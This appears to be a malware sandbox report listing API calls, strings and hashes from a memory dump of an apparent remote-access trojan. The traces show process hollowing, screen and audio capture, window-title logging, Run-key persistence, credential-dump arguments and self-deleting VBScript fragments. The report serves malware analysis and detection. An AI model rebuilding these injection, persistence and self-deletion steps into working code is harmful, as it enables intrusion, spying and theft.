• Instruction Fuzzy Hash:
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
• Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
• Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
• Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
  • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
• DeleteDC.GDI32(?), ref: 0041806D
• DeleteDC.GDI32(00000000), ref: 00418070
• SelectObject.GDI32(00000000,00000000), ref: 0041807B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
• GetIconInfo.USER32(?,?), ref: 004180DB
• DeleteObject.GDI32(?), ref: 0041810A
• DeleteObject.GDI32(?), ref: 00418117
• DrawIcon.USER32(00000000,?,?,?), ref: 00418124
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
• GetObjectA.GDI32(?,00000018,?), ref: 00418183
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
• DeleteDC.GDI32(?), ref: 0041828F
• DeleteDC.GDI32(00000000), ref: 00418292
• DeleteObject.GDI32(00000000), ref: 00418295
• GlobalFree.KERNEL32(00CC0020), ref: 004182A0
• DeleteObject.GDI32(00000000), ref: 00418354
• GlobalFree.KERNEL32(?), ref: 0041835B
• DeleteDC.GDI32(?), ref: 0041836B
• DeleteDC.GDI32(00000000), ref: 00418376
• DeleteDC.GDI32(?), ref: 004183A8
• DeleteDC.GDI32(00000000), ref: 004183AB
• DeleteObject.GDI32(?), ref: 004183B1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1765752176-865373369
• Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
• Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
• Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
• Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                            • API String ID: 4188446516-3035715614
                                                                                                                                                                                                                                            • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                            • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
  • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
  • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
  • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
• OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
  • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
• API String ID: 4250697656-2665858469
• Opcode ID: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
• Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
• Opcode Fuzzy Hash: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
• Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
• ExitProcess.KERNEL32 ref: 0040C287
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-1998216422
• Opcode ID: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
• Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
• Opcode Fuzzy Hash: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
• Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
• SetEvent.KERNEL32 ref: 0041A39A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
• CloseHandle.KERNEL32 ref: 0041A3BB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                            • API String ID: 738084811-1408154895
                                                                                                                                                                                                                                            • Opcode ID: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                                                                            • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Write$Create
                                                                                                                                                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000001,004068B2,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                            • API String ID: 1646373207-4179007786
                                                                                                                                                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                                                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                                                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                                                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                                                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                            • Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                                                                            • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
APIs
• __Init_thread_footer.LIBCMT ref: 0040A456
• Sleep.KERNEL32(000001F4), ref: 0040A461
• GetForegroundWindow.USER32 ref: 0040A467
• GetWindowTextLengthW.USER32(00000000), ref: 0040A470
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
• Sleep.KERNEL32(000003E8), ref: 0040A574
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
• API String ID: 911427763-1497357211
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
• GetCursorPos.USER32(?), ref: 0041CB08
• SetForegroundWindow.USER32(?), ref: 0041CB11
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
• ExitProcess.KERNEL32 ref: 0041CB84
• CreatePopupMenu.USER32 ref: 0041CB8A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                            • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                                                                                                                                            APIs
